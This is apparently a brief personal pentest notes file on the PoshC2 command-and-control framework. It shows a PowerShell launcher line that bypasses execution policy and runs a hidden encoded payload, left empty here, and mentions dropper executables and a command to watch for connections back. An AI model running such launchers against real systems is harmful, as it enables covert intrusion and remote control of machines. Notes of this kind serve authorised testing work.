kolbyn24/Notes/03 - Content/poshc2.md

 Copy payload (use this in your exploit): powershell -exec bypass -Noninteractive -windowstyle hidden -e ''

+#or use one of the dropper exe files to use in your payload

 Watch for connections back:
 posh -u <username>